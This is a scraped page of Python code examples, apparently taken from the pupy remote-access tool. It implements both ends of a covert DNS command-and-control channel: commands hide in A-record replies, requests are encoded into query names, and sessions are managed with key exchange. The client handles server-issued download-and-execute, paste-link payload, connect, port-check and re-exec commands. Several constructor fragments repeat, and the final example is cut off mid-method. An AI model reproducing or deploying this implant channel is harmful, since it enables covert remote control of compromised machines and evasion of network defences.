Ejemplo n.º 1
0
    def __init__(self, domain, key):
        """Set up client state for one or more command domains.

        ``domain`` is a comma-separated list of domains; the first entry
        becomes the active one. ``key`` is handed to ``ECPV`` as the public
        key.
        """
        self.domains = domain.split(',')
        self.domain_id = 0
        self.domain = self.domains[self.domain_id]

        # Alphabets used to build the character substitution table.
        upper = ''.join(chr(code) for code in xrange(ord('A'), ord('Z') + 1))
        lower = ''.join(chr(code) for code in xrange(ord('a'), ord('z') + 1))
        digits = ''.join(chr(code) for code in xrange(ord('0'), ord('9') + 1))

        # 'A'-'Z', '0'-'9', '=' map positionally onto 'a'-'z', '-', '0'-'9'.
        self.translation = dict(
            zip(upper + digits + '=', lower + '-' + digits))

        self.encoder = ECPV(public_key=key)
        self.spi = None
        self.kex = None
        # Note: `1 << 32 - 1` parses as `1 << 31` (subtraction binds tighter
        # than the shift), so the upper bound is 2**31.
        self.nonce = random.randrange(0, 1 << 32 - 1)
        self.poll = 60
        self.active = True
        self.failed = 0
        self.proxy = None

        Thread.__init__(self)
Ejemplo n.º 2
0
    def __init__(self, domain, key, recursor=None, timeout=None):
        """Initialise handler state.

        ``key`` is passed to ``ECPV`` as the private key. When ``timeout`` is
        falsy it defaults to three times ``self.interval``.
        """
        # Alphabets used to build the character substitution table.
        lower = ''.join(chr(code) for code in xrange(ord('a'), ord('z') + 1))
        upper = ''.join(chr(code) for code in xrange(ord('A'), ord('Z') + 1))
        digits = ''.join(chr(code) for code in xrange(ord('0'), ord('9') + 1))

        self.sessions = {}
        self.domain = domain
        self.recursor = recursor
        self.encoder = ECPV(private_key=key)
        # 'a'-'z', '-', '0'-'9' map positionally onto 'A'-'Z', '0'-'9', '='.
        self.translation = dict(
            zip(lower + '-' + digits, upper + digits + '='))

        self.interval = 30
        self.kex = True
        if timeout:
            self.timeout = timeout
        else:
            self.timeout = self.interval * 3
        self.commands = []
        self.lock = RLock()
        self.finished = Event()
Ejemplo n.º 3
0
    def __init__(self, domain, key, recursor=None, timeout=None):
        """Create the handler's initial state.

        ``key`` goes to ``ECPV`` as the private key; ``timeout`` falls back
        to ``3 * self.interval`` when it is falsy.
        """
        letters_lower = ''.join(
            chr(code) for code in xrange(ord('a'), ord('z') + 1))
        letters_upper = ''.join(
            chr(code) for code in xrange(ord('A'), ord('Z') + 1))
        numerals = ''.join(
            chr(code) for code in xrange(ord('0'), ord('9') + 1))

        self.sessions = {}
        self.domain = domain
        self.recursor = recursor
        self.encoder = ECPV(private_key=key)
        # Positional mapping: 'a'-'z', '-', '0'-'9' -> 'A'-'Z', '0'-'9', '='.
        source_alphabet = letters_lower + '-' + numerals
        target_alphabet = letters_upper + numerals + '='
        self.translation = dict(zip(source_alphabet, target_alphabet))

        self.interval = 30
        self.kex = True
        self.timeout = timeout if timeout else self.interval * 3
        self.commands = []
        self.lock = RLock()
        self.finished = Event()
Ejemplo n.º 4
0
class DnsCommandsClient(Thread):
    """Thread that polls a command server through DNS A-record lookups.

    Each request is packed into a ``Parcel``, encoded into a hostname under
    the currently selected domain and resolved with
    ``socket.gethostbyname_ex``; the returned addresses are decoded back into
    a ``Parcel`` of commands. Subclasses override the ``on_*`` hooks to react
    to individual commands.
    """

    def __init__(self, domain, key):
        """Prepare client state.

        Args:
            domain: Comma-separated list of domains; the first is used
                initially and ``next()`` rotates through the rest.
            key: Passed to ``ECPV`` as ``public_key``.
        """
        self.domains = domain.split(',')
        self.domain_id = 0
        self.domain = self.domains[self.domain_id]

        upper = ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)])
        lower = ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)])
        digits = ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)])
        # Substitution applied to base32 output in _q_page_encoder:
        # 'A'-'Z', '0'-'9', '=' map positionally onto 'a'-'z', '-', '0'-'9'.
        self.translation = dict(
            zip(upper + digits + '=', lower + '-' + digits))

        self.encoder = ECPV(public_key=key)
        self.spi = None
        self.kex = None
        # Note: `1 << 32 - 1` parses as `1 << 31`; kept as-is so the initial
        # nonce range is unchanged.
        self.nonce = random.randrange(0, 1 << 32 - 1)
        self.poll = 60
        self.active = True
        self.failed = 0

        Thread.__init__(self)

    def next(self):
        """Switch to the next configured domain and reset the failure count."""
        self.domain_id = (self.domain_id + 1) % len(self.domains)
        self.domain = self.domains[self.domain_id]
        self.failed = 0

    def _a_page_decoder(self, addresses, nonce, symmetric=None):
        """Reassemble and decode a response carried in A-record addresses.

        Every dotted-quad address is read as a 32-bit integer: bits 25-28
        give the chunk index and bits 1-24 hold three payload bytes. The
        first byte of the joined chunks is the payload length.

        Args:
            addresses: Iterable of dotted-quad strings.
            nonce: Nonce that was used for the matching request.
            symmetric: Passed to ``self.encoder.decode``; defaults to
                ``self.encoder.kex_completed`` when ``None``.

        Raises:
            DnsCommandClientDecodingError: if the encoder fails to decode.
        """
        if symmetric is None:
            symmetric = self.encoder.kex_completed

        resp = len(addresses) * [None]
        for address in addresses:
            raw = 0
            for i, x in enumerate(address.split('.')):
                raw |= int(x) << (3 - i) * 8

            idx = (raw & 0x1E000000) >> 25
            bits = (raw & 0x01FFFFFE) >> 1
            # Drop the leading zero byte of the 4-byte big-endian packing.
            resp[idx] = struct.pack('>I', bits)[1:]

        data = b''.join(resp)
        length = struct.unpack_from('B', data)[0]
        payload = data[1:1 + length]

        try:
            return self.encoder.decode(payload, nonce, symmetric)
        except Exception as e:
            logging.exception(e)
            raise DnsCommandClientDecodingError

    def _q_page_encoder(self, data):
        """Encode ``data`` into a hostname under the active domain.

        The labels are, in order: the SPI (only when one is set), the nonce
        and the encoded data, each base32-encoded and passed through
        ``self.translation``. ``self.nonce`` is advanced by the length of the
        resulting name.

        Returns:
            Tuple ``(hostname, nonce)`` where ``nonce`` is the value used for
            this request.

        Raises:
            ValueError: if ``data`` is longer than 35 bytes.
        """
        if len(data) > 35:
            raise ValueError('Too big page size')

        nonce = self.nonce
        parts = []
        if self.spi:
            parts.append(struct.pack('>I', self.spi))
        parts.append(struct.pack('>I', nonce))
        parts.append(self.encoder.encode(data, nonce, symmetric=True))

        encoded = '.'.join([
            ''.join([self.translation[x] for x in base64.b32encode(part)])
            for part in parts
        ]) + '.' + self.domain

        self.nonce += len(encoded)
        return encoded, nonce

    def _fallback_failed(self, reason):
        """Log a failed public-key fallback and rotate domains when repeated.

        The counter is logged before it is incremented; once it exceeds 5
        the client moves on to the next domain.
        """
        logging.error(
            'CRC FAILED / Fallback failed also / {} / {}/{}'.format(
                reason, self.failed, 5
            )
        )
        self.failed += 1
        if self.failed > 5:
            self.next()

    def _request(self, *commands):
        """Send ``commands`` in one parcel and return the commands received.

        Returns an empty list when the lookup fails, when the answer holds
        fewer than two addresses, or when the response cannot be unpacked
        with either the current decoding mode or the public-key fallback.
        """
        parcel = Parcel(*commands)
        page, nonce = self._q_page_encoder(parcel.pack())

        try:
            _, _, addresses = socket.gethostbyname_ex(page)
        except socket.error as e:
            logging.error('DNSCNC: Communication error: {}'.format(e))
            self.next()
            return []

        if len(addresses) < 2:
            logging.warning('DNSCNC: short answer: {}'.format(addresses))
            return []

        response = None

        try:
            response = Parcel.unpack(
                self._a_page_decoder(addresses, nonce)
            )

            self.failed = 0
        except ParcelInvalidCrc:
            logging.error('CRC FAILED / Fallback to Public-key decoding')

            try:
                response = Parcel.unpack(
                    self._a_page_decoder(addresses, nonce, False)
                )

                # The fallback worked, so the session key is stale: drop it.
                self.spi = None
                self.encoder.kex_reset()

            except ParcelInvalidCrc:
                self._fallback_failed('CRC')
                return []

            except ParcelInvalidPayload:
                self._fallback_failed('Invalid payload')
                return []

        return response.commands

    def on_pastelink(self, url, action, encoder):
        """Fetch ``url``, unwrap its content and pass it on if the hash matches.

        The body is ascii85-decoded, unpacked with ``self.encoder``,
        decompressed, and split into a 20-byte SHA-1 digest plus content.
        The ``encoder`` argument is not used by this implementation.
        """
        proxy = urllib2.ProxyHandler()
        opener = urllib2.build_opener(proxy)
        response = opener.open(url)
        if response.code == 200:
            try:
                content = response.read()
                content = ascii85.ascii85DecodeDG(content)
                content = self.encoder.unpack(content)
                content = zlib.decompress(content)
                chash, content = content[:20], content[20:]
                h = hashlib.sha1()
                h.update(content)
                if h.digest() == chash:
                    self.on_pastelink_content(url, action, content)
                else:
                    logging.error('PasteLink: Wrong hash after extraction: {} != {}'.format(
                        h.digest(), chash))
            except Exception as e:
                logging.exception(e)

    def on_downloadexec(self, url, action, use_proxy):
        """Download ``url`` and hand the body to ``on_downloadexec_content``.

        When ``use_proxy`` is true the request goes through an opener built
        with ``urllib2.ProxyHandler()``; otherwise ``urllib2.urlopen`` is used.
        Any exception is logged and swallowed.
        """
        if use_proxy:
            opener = urllib2.build_opener(urllib2.ProxyHandler()).open
        else:
            opener = urllib2.urlopen

        try:
            response = opener(url)
            if response.code == 200:
                self.on_downloadexec_content(url, action, response.read())

        except Exception as e:
            logging.exception(e)

    def on_pastelink_content(self, url, action, content):
        """Hook: called with verified PasteLink content. No-op by default."""
        pass

    def on_downloadexec_content(self, url, action, content):
        """Hook: called with downloaded content. No-op by default."""
        pass

    def on_connect(self, ip, port, transport):
        """Hook: called for a ``Connect`` command. No-op by default."""
        pass

    def on_checkconnect(self, host, port_start, port_end=None):
        """Hook: called for a ``CheckConnect`` command. No-op by default."""
        pass

    def on_exit(self):
        """Hook: called for an ``Exit`` command; stops the polling loop."""
        self.active = False

    def on_disconnect(self):
        """Hook: called for a ``Disconnect`` command. No-op by default."""
        pass

    def on_error(self, error, message=None):
        """Hook: called for an ``Error`` command. No-op by default."""
        pass

    def process(self):
        """Run one poll cycle: fetch commands, acknowledge and dispatch them.

        ``SystemStatus`` is sent when a session (``self.spi``) exists,
        otherwise ``Poll``. Returns early if a key exchange fails.
        """
        if self.spi:
            commands = list(self._request(SystemStatus()))
        else:
            commands = list(self._request(Poll()))

        logging.debug('commands: {}'.format(commands))
        ack = self._request(Ack(len(commands)))
        if not (len(ack) == 1 and isinstance(ack[0], Ack)):
            logging.error('ACK <-> ACK failed: received: {}'.format(ack))

        for command in commands:
            if isinstance(command, Policy):
                self.poll = command.poll

                if command.kex and not self.spi:
                    request = self.encoder.generate_kex_request()
                    kex = Kex(request)
                    response = self._request(kex)
                    if not len(response) == 1 or not isinstance(response[0], Kex):
                        logging.error('KEX sequence failed. Got {} instead of Kex'.format(
                            response))
                        return

                    self.encoder.process_kex_response(response[0].parcel)
                    self.spi = kex.spi
            elif isinstance(command, Poll):
                # Validate the reply that was just received (`ack`), using
                # the same single-Ack check as above.
                ack = self._request(SystemInfo())
                if not (len(ack) == 1 and isinstance(ack[0], Ack)):
                    logging.error('SystemInfo: ACK expected but {} found'.format(
                        ack))
                ack = self._request(SystemStatus())
                if not (len(ack) == 1 and isinstance(ack[0], Ack)):
                    logging.error('SystemStatus: ACK expected but {} found'.format(
                        ack))
            elif isinstance(command, PasteLink):
                self.on_pastelink(command.url, command.action, self.encoder)
            elif isinstance(command, DownloadExec):
                self.on_downloadexec(command.url, command.action, command.proxy)
            elif isinstance(command, Connect):
                self.on_connect(command.ip, command.port, transport=command.transport)
            elif isinstance(command, Error):
                self.on_error(command.error, command.message)
            elif isinstance(command, Disconnect):
                self.on_disconnect()
            elif isinstance(command, Sleep):
                time.sleep(command.timeout)
            elif isinstance(command, CheckConnect):
                self.on_checkconnect(command.host, command.port_start, port_end=command.port_end)
            elif isinstance(command, Reexec):
                executable = os.readlink('/proc/self/exe')
                with open('/proc/self/cmdline') as cmdline:
                    args = cmdline.read().split('\x00')
                # cmdline ends with a NUL, which leaves a trailing empty
                # string after split; do not pass it on as an extra argument.
                if args and args[-1] == '':
                    args.pop()
                os.execv(executable, args)
            elif isinstance(command, Exit):
                self.active = False
                self.on_exit()

    def run(self):
        """Call ``process`` repeatedly, sleeping ``self.poll`` seconds between
        cycles, until ``self.active`` becomes false. Exceptions raised by
        ``process`` are logged and do not stop the loop.
        """
        while True:
            try:
                self.process()
            except Exception as e:
                logging.exception(e)

            if self.active:
                logging.debug('sleep {}'.format(self.poll))
                time.sleep(self.poll)
            else:
                break
Ejemplo n.º 5
0
class DnsCommandServerHandler(BaseResolver):
    """DNS resolver that decodes command requests from query names.

    Queries under ``self.domain`` are decoded into ``Parcel`` commands and
    processed per session; queries for other names are forwarded to
    ``self.recursor`` when one is configured, otherwise answered NXDOMAIN.
    """

    def __init__(self, domain, key, recursor=None, timeout=None):
        """Initialise handler state.

        Args:
            domain: Domain suffix this handler serves.
            key: Passed to ``ECPV`` as ``private_key``.
            recursor: Optional upstream used for names outside ``domain``.
            timeout: Session idle timeout; defaults to ``3 * self.interval``
                when falsy.
        """
        self.sessions = {}
        self.domain = domain
        self.recursor = recursor
        self.encoder = ECPV(private_key=key)

        lower = ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)])
        upper = ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)])
        digits = ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)])
        # 'a'-'z', '-', '0'-'9' map positionally onto 'A'-'Z', '0'-'9', '='
        # (applied to query labels before base32 decoding).
        self.translation = dict(
            zip(lower + '-' + digits, upper + digits + '='))

        self.interval = 30
        self.kex = True
        self.timeout = timeout or self.interval * 3
        self.commands = []
        self.lock = RLock()
        self.finished = Event()
        # resolve() reads the cache, so it must exist before cleanup() has
        # had a chance to (re)create it.
        self.cache = {}

    def cleanup(self):
        """Periodically drop idle sessions and clear the response cache.

        Loops until ``self.finished`` is set, sleeping ``self.timeout``
        seconds between passes.
        """
        while not self.finished.is_set():
            with self.lock:
                to_remove = []
                for spi, session in self.sessions.iteritems():
                    if session.idle > self.timeout:
                        to_remove.append(spi)
                for spi in to_remove:
                    del self.sessions[spi]

                self.cache = {}

            time.sleep(self.timeout)

    def locked(f):
        """Decorator: run the wrapped method while holding ``self.lock``."""
        @functools.wraps(f)
        def wrapped(self, *args, **kwargs):
            with self.lock:
                return f(self, *args, **kwargs)

        return wrapped

    @locked
    def add_command(self, command, session=None, default=False):
        """Queue ``command`` for matching sessions.

        Args:
            command: Command object to queue.
            session: SPI or node selector (see ``find_sessions``); when
                falsy the command goes to every session returned by
                ``find_sessions()``.
            default: When true, also append to ``self.commands``.

        Returns:
            Number of sessions the command was added to.
        """
        if default:
            self.commands.append(command)

        if session:
            sessions = self.find_sessions(spi=session) or \
              self.find_sessions(node=session)

            if not sessions:
                return 0

            count = 0
            if type(sessions) in (list, tuple):
                for session in sessions:
                    session.add_command(command)
                    count += 1
            else:
                count = 1
                sessions.add_command(command)

            return count
        else:
            count = 0
            for session in self.find_sessions():
                session.add_command(command)
                count += 1

            return count

    @locked
    def reset_commands(self, session=None, default=False):
        """Clear queued commands.

        Args:
            session: SPI or node selector; a string is parsed as a single
                hexadecimal number. When falsy, every session returned by
                ``find_sessions()`` that has commands is cleared.
            default: When true, also clear ``self.commands``.

        Returns:
            Number of sessions whose queue was cleared.
        """
        if session:
            if type(session) in (str, unicode):
                session = int(session, 16)

        if default:
            self.commands = []

        if session:
            sessions = self.find_sessions(spi=session) or \
              self.find_sessions(node=session)

            if not sessions:
                return 0

            count = 0
            if type(sessions) in (list, tuple):
                for session in sessions:
                    session.commands = []
                    count += 1
            else:
                count = 1
                sessions.commands = []

            return count
        else:
            count = 0
            for session in self.find_sessions():
                if session.commands:
                    session.commands = []
                    count += 1
            return count

    @locked
    def find_sessions(self, spi=None, node=None):
        """Return sessions selected by SPI or by node id.

        ``spi`` and ``node`` may each be an integer, a list of integers, or
        a comma-separated string of hexadecimal numbers. With neither given,
        all sessions that have ``system_info`` are returned. ``spi`` takes
        precedence over ``node``.
        """
        if spi:
            if isinstance(spi, (str, unicode)):
                spi = [int(x, 16) for x in spi.split(',')]
            elif isinstance(spi, (int, long)):
                # Includes `long`, so large values are wrapped too.
                spi = [spi]

        if node:
            if isinstance(node, (str, unicode)):
                node = [int(x, 16) for x in node.split(',')]
            elif isinstance(node, (int, long)):
                node = [node]

        if not (spi or node):
            return [
                session for session in self.sessions.itervalues()
                if session.system_info is not None
            ]
        elif spi:
            return [self.sessions.get(x) for x in spi if x in self.sessions]
        elif node:
            wanted = set(node)
            return [
                session for session in self.sessions.itervalues()
                if session.system_info and
                session.system_info['node'] in wanted
            ]

    @locked
    def set_policy(self, kex=True, timeout=None, interval=None, node=None):
        """Update polling policy and queue a ``Policy`` command.

        With ``node`` and at least one of ``interval``/``timeout`` the change
        applies to the first matching session only; otherwise the handler's
        defaults are updated.

        Returns:
            ``None`` when the requested values equal the current ones,
            otherwise the result of ``add_command``.

        Raises:
            ValueError: if ``interval`` is set and below 30 seconds.
        """
        # Nothing to do when every requested value matches the current one.
        if kex == self.kex and self.timeout == timeout and self.interval == interval:
            return

        if interval and interval < 30:
            raise ValueError(
                'Interval should not be less then 30s to avoid DNS storm')

        if node and (interval or timeout):
            session = self.find_sessions(spi=node) or self.find_sessions(
                node=node)

            if session:
                session = session[0]

                if interval:
                    session.timeout = (interval * 3)
                else:
                    interval = self.interval

                if timeout:
                    session.timeout = timeout

                if kex is None:
                    kex = self.kex

        else:
            self.interval = interval or self.interval
            self.timeout = max(timeout if timeout else self.timeout,
                               self.interval * 3)
            self.kex = kex if (kex is not None) else self.kex

            interval = self.interval
            kex = self.kex

        cmd = Policy(interval, kex)
        return self.add_command(cmd, session=node)

    @locked
    def encode_pastelink_content(self, content):
        """Wrap ``content`` for delivery via a paste link.

        Prepends the SHA-1 digest, compresses with zlib level 9, packs with
        ``self.encoder`` and ascii85-encodes the result.
        """
        h = hashlib.sha1()
        h.update(content)

        content = h.digest() + content
        content = zlib.compress(content, 9)
        content = self.encoder.pack(content)
        content = ascii85.ascii85EncodeDG(content)

        return content

    def on_connect(self, info):
        """Hook: no-op by default."""
        pass

    def on_keep_alive(self, info):
        """Hook: called with a session's ``system_info`` on poll/ack."""
        pass

    def on_exit(self, info):
        """Hook: called with a session's ``system_info`` on ``Exit``."""
        pass

    def _a_page_encoder(self, data, encoder, nonce):
        """Encode ``data`` into a list of A resource records.

        The encoded data is prefixed with a one-byte length and split into
        3-byte chunks. Each record's address packs a random value 1-6 in the
        top three bits, the chunk index starting at bit 25 and the chunk
        bytes in bits 1-24; short final chunks are padded with a repeated
        random byte.

        Raises:
            ValueError: if length byte plus encoded data exceed 48 bytes.
        """
        data = encoder.encode(data, nonce, symmetric=encoder.kex_completed)

        length = struct.pack('B', len(data))
        payload = length + data

        if len(payload) > 48:
            raise ValueError('Page size more than 48 bytes ({})'.format(
                len(payload)))

        response = []
        chunks = [payload[i:i + 3] for i in xrange(0, len(payload), 3)]

        for idx, part in enumerate(chunks):
            header = (random.randint(1, 6) << 29)
            idx = idx << 25
            bits = (struct.unpack(
                '>I', '\x00' + part + chr(random.randrange(0, 255)) *
                (3 - len(part)))[0]) << 1
            packed = struct.unpack(
                '!BBBB',
                struct.pack('>I',
                            header | idx | bits | int(not bool(bits & 6))))
            address = '.'.join(['{}'.format(int(x)) for x in packed])
            response.append(RR('.', QTYPE.A, rdata=A(address), ttl=600))

        return response

    def _q_page_decoder(self, data):
        """Decode a query name into ``(payload, session, nonce)``.

        The labels left after stripping ``self.domain`` are either
        ``nonce.data`` (no session; the handler's own encoder is used) or
        ``spi.nonce.data`` (the session's encoder is used).

        Raises:
            DnsPingRequest: for empty or ``ping[N]`` single-label names.
            DnsNoCommandServerException: if the label count is not 2 or 3.
            DnsCommandServerException: if the SPI is not a known session.
        """
        parts = data.stripSuffix(self.domain).idna()[:-1].split('.')

        if len(parts) == 0:
            raise DnsPingRequest(1)
        elif len(parts) == 1 and parts[0].startswith('ping'):
            if len(parts[0]) == 4:
                raise DnsPingRequest(15)
            else:
                raise DnsPingRequest(int(parts[0][4:]))

        elif len(parts) not in (2, 3):
            raise DnsNoCommandServerException()

        parts = [
            base64.b32decode(''.join([self.translation[x] for x in part]))
            for part in parts
        ]

        if len(parts) == 2:
            nonce, data = parts
            nonce = struct.unpack('>I', nonce)[0]
            encoder = self.encoder
            session = None
        elif len(parts) == 3:
            spi, nonce, data = parts
            spi = struct.unpack('>I', spi)[0]
            nonce = struct.unpack('>I', nonce)[0]
            session = None
            with self.lock:
                if spi not in self.sessions:
                    raise DnsCommandServerException('NO_SESSION', nonce)
                session = self.sessions[spi]
            encoder = session.encoder

        return encoder.decode(data, nonce, symmetric=True), session, nonce

    def _cmd_processor(self, command, session):
        """Handle one decoded command and return the list of replies.

        ``session`` is ``None`` for requests that carried no SPI.
        """
        logging.debug('dnscnc:commands={} session={}'.format(command, session))

        if isinstance(command, Poll) and session is None:
            return [Policy(self.interval, self.kex), Poll()]

        elif isinstance(command, Ack) and (session is None):
            return [Ack()]

        elif isinstance(command, Exit):
            if session and session.system_info:
                self.on_exit(session.system_info)

            # An Exit without a session has nothing to remove; pop() also
            # tolerates a session that was already dropped.
            if session is not None:
                with self.lock:
                    self.sessions.pop(session.spi, None)

            return [Exit()]

        elif (isinstance(command, Poll)
              or isinstance(command, SystemStatus)) and (session is not None):
            if session.system_info:
                self.on_keep_alive(session.system_info)

            if isinstance(command, SystemStatus):
                session.system_status = command.get_dict()

            commands = session.commands
            return commands

        elif isinstance(command, Ack) and (session is not None):
            if session.system_info:
                self.on_keep_alive(session.system_info)

            if command.amount > len(session.commands):
                logging.info('ACK: invalid amount of commands: {} > {}'.format(
                    command.amount, len(session.commands)))
            # Drop the commands the client has acknowledged.
            session.commands = session.commands[command.amount:]
            return [Ack()]

        elif isinstance(command, SystemInfo) and session is not None:
            session.system_info = command.get_dict()
            return [Ack()]

        elif isinstance(command, Kex):
            with self.lock:
                response = []

                if command.spi not in self.sessions:
                    self.sessions[command.spi] = Session(
                        command.spi, self.encoder.clone(), self.commands,
                        self.timeout)

                encoder = self.sessions[command.spi].encoder
                response, key = encoder.process_kex_request(command.parcel)
                logging.debug('dnscnc:kex:key={}'.format(
                    binascii.b2a_hex(key[0])))

            return [Kex(response)]
        else:
            return [Error('NO_POLICY')]

    def resolve(self, request, handler):
        """Answer a DNS request, serving repeats from ``self.cache``.

        Non-A queries get NXDOMAIN. Responses are cached by the query name
        with ``self.domain`` stripped; a cached response has its header id
        rewritten to match the new request.
        """
        if request.q.qtype != QTYPE.A:
            reply = request.reply()
            reply.header.rcode = RCODE.NXDOMAIN
            logging.debug('Request unknown qtype: {}'.format(
                QTYPE.get(request.q.qtype)))
            return reply

        with self.lock:
            data = request.q.qname
            part = data.stripSuffix(self.domain).idna()[:-1]
            if part in self.cache:
                response = self.cache[part]
                response.header.id = request.header.id
                return response

            response = self._resolve(request, handler)
            self.cache[part] = response
            return response

    def _resolve(self, request, handler):
        """Decode and process one uncached query.

        NOTE(review): when decoding and processing succeed (and on the
        DnsCommandServerException / ParcelInvalidCrc paths) control falls off
        the end of this method, so it returns ``None`` and ``responses`` is
        collected but not used here. The method looks truncated -- confirm
        against the full source.
        """
        qname = request.q.qname
        reply = request.reply()

        # TODO:
        # Resolve NS?, DS, SOA somehow
        if not qname.matchSuffix(self.domain):
            if self.recursor:
                try:
                    return DNSRecord.parse(
                        request.send(self.recursor, timeout=2))
                except socket.error:
                    pass
                except Exception:
                    logging.exception('DNS request forwarding failed')

            reply.header.rcode = RCODE.NXDOMAIN
            return reply

        responses = []

        session = None
        nonce = None

        try:
            request, session, nonce = self._q_page_decoder(qname)
            if session and session.last_nonce and session.last_qname:
                if nonce < session.last_nonce:
                    logging.info('Ignore nonce from past: {} < {}'.format(
                        nonce, session.last_nonce))
                    reply.header.rcode = RCODE.NXDOMAIN
                    return reply
                elif session.last_nonce == nonce and session.last_qname != qname:
                    logging.info(
                        'Last nonce but different qname: {} != {}'.format(
                            session.last_qname, qname))
                    reply.header.rcode = RCODE.NXDOMAIN
                    return reply

            for command in Parcel.unpack(request):
                for response in self._cmd_processor(command, session):
                    responses.append(response)

            if session:
                session.last_nonce = nonce
                session.last_qname = qname

        except DnsCommandServerException as e:
            nonce = e.nonce
            responses = [e.error, Policy(self.interval, self.kex), Poll()]

        except ParcelInvalidCrc as e:
            responses = [e.error]

        except DnsNoCommandServerException:
            reply.header.rcode = RCODE.NXDOMAIN
            return reply

        except DnsPingRequest as e:
            # Answer with e.args[0] records 127.0.X.Y.
            for i in xrange(e.args[0]):
                x = (i % 65536) >> 8
                y = i % 256
                a = RR('.',
                       QTYPE.A,
                       rdata=A('127.0.{}.{}'.format(x, y)),
                       ttl=10)
                a.rname = qname
                reply.add_answer(a)

            return reply

        except TypeError:
            # Usually - invalid padding
            reply.header.rcode = RCODE.NXDOMAIN
            return reply
Ejemplo n.º 6
0
    def __init__(self, domain, key, ns=None, qtype='A', ns_proto=socket.SOCK_DGRAM, ns_timeout=3):
        """Prepare client state and choose the resolver implementation.

        Args:
            domain: Comma-separated list of domains; the first is active.
            key: Passed to ``ECPV`` as ``public_key``.
            ns: Optional name server, either a ``(host, port)`` list/tuple
                or a ``"host[:port]"`` string (port defaults to 53). Only
                honoured when ``dnslib`` is available.
            qtype: Query type stored for the dnslib resolver.
            ns_proto: Socket type stored for the dnslib resolver.
            ns_timeout: Timeout stored for the dnslib resolver.

        Raises:
            ValueError: if an ``ns`` string has more than one ``:``.
        """
        # pupy is optional; fall back to a fixed cid when it (or its `cid`
        # attribute) is missing. `except Exception` keeps SystemExit and
        # KeyboardInterrupt from being swallowed here.
        try:
            import pupy
            self.pupy = pupy
            self.cid = pupy.cid
        except Exception:
            self.pupy = None
            self.cid = 31337

        self.iid = os.getpid() % 65535

        if ns and dnslib:
            if not isinstance(ns, (list, tuple)):
                ns = ns.split(':')
                if len(ns) == 1:
                    ns = (ns[0], 53)
                elif len(ns) == 2:
                    ns = ns[0], int(ns[1])
                else:
                    raise ValueError('Invalid NS address: {}'.format(ns))

            self.ns = ns
            self.ns_proto = ns_proto
            self.ns_socket = None
            self.ns_timeout = ns_timeout
            self.ns_socket_lock = Lock()
            self.qtype = qtype
            self.resolve = self._dnslib_resolve
        else:
            if ns:
                logging.error('dnslib not available, use system resolver')

            self.ns = None
            self.ns_socket = None
            self.qtype = None
            self.ns_timeout = None
            self.resolve = self._native_resolve

        self.node = uuid.getnode()
        self.nonce = from_bytes(get_random_bytes(4))
        self.domains = domain.split(',')
        self.domain_id = 0
        self.domain = self.domains[self.domain_id]

        upper = ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)])
        lower = ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)])
        digits = ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)])
        # 'A'-'Z', '0'-'9', '=' map positionally onto 'a'-'z', '-', '0'-'9'.
        self.translation = dict(
            zip(upper + digits + '=', lower + '-' + digits))

        self.encoder = ECPV(public_key=key, curve='brainpoolP224r1')
        self.spi = None
        self.kex = None
        self.poll = 60
        self.active = True
        self.failed = 0
        self.proxy = None
        self._request_lock = Lock()

        Thread.__init__(self)
Ejemplo n.º 7
0
class DnsCommandsClient(Thread):
    """Client side of the DNS command channel, run as a polling thread.

    Requests are packed into a Parcel, encoded by the ECPV encoder, base32
    encoded into hostname labels under the current domain and resolved with
    ``socket.gethostbyname_ex``; the returned A records carry the encoded
    reply. Subclasses react to server commands by overriding the ``on_*``
    hooks.
    """

    def __init__(self, domain, key):
        """Initialise channel state.

        domain -- comma separated list of domains to rotate through
        key    -- public key handed to the ECPV encoder
        """
        self.domains = domain.split(',')
        self.domain_id = 0
        self.domain = self.domains[self.domain_id]
        # Positional mapping from the characters base32 output may contain
        # (A-Z, 0-9, '=') onto characters usable in a hostname label
        # (a-z, '-', 0-9).
        self.translation = dict(zip(
            'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + '0123456789' + '=',
            'abcdefghijklmnopqrstuvwxyz' + '-' + '0123456789'
        ))
        self.encoder = ECPV(public_key=key)
        self.spi = None
        self.kex = None
        # The former bound ``1<<32-1`` parses as ``1 << 31``; it is spelled
        # out here with the same effective range. Starting in the lower half
        # leaves headroom for the per-request increments before the nonce
        # stops fitting the unsigned 32-bit field it is packed into.
        self.nonce = random.randrange(0, 1 << 31)
        self.poll = 60
        self.active = True
        self.failed = 0
        self.proxy = None

        Thread.__init__(self)

    def next(self):
        """Switch to the next configured domain and reset the failure count."""
        self.domain_id = (self.domain_id + 1) % len(self.domains)
        self.domain = self.domains[self.domain_id]
        self.failed = 0

    def _a_page_decoder(self, addresses, nonce, symmetric=None):
        """Reassemble and decode the payload carried by a set of A records.

        Each dotted-quad address is read as a 32-bit word: bits 25-28 hold
        the chunk index and bits 1-24 hold three payload bytes. The first
        byte of the reassembled data is the payload length.

        addresses -- IPv4 address strings taken from the DNS answer
        nonce     -- nonce that was sent with the request
        symmetric -- force symmetric (True) or public-key (False) decoding;
                     defaults to ``self.encoder.kex_completed``

        Raises DnsCommandClientDecodingError when the encoder fails.
        """
        if symmetric is None:
            symmetric = self.encoder.kex_completed

        chunks = len(addresses) * [None]
        for address in addresses:
            raw = 0
            for i, octet in enumerate(address.split('.')):
                raw |= int(octet) << (3 - i) * 8

            idx = (raw & 0x1E000000) >> 25
            bits = (raw & 0x01FFFFFE) >> 1
            # Keep only the three low-order bytes of the 24-bit value.
            chunks[idx] = struct.pack('>I', bits)[1:]

        data = b''.join(chunks)
        length = struct.unpack_from('B', data)[0]
        payload = data[1:1 + length]

        try:
            return self.encoder.decode(payload, nonce, symmetric)
        except Exception as e:
            logging.exception(e)
            raise DnsCommandClientDecodingError

    def _q_page_encoder(self, data):
        """Encode ``data`` into a hostname under the current domain.

        The labels are, in order: the SPI (only when a session exists), the
        nonce and the encoded payload, each base32 encoded and translated
        through ``self.translation``. The stored nonce is advanced by the
        length of the produced name.

        Returns ``(hostname, nonce_used)``.
        Raises ValueError when ``data`` is longer than 35 bytes.
        """
        if len(data) > 35:
